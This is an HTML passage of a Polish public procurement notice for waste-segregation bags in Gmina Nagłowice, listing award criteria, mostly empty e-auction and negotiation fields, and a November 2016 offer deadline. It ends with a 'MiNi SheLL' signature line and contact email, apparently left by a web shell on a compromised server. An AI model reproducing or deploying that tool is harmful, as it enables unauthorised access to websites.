              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>wyposażenie przez Wykonawcę nieruchomości zamieszkałych z terenu Gminy Nagłowice w worki na odpady segregowane  </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com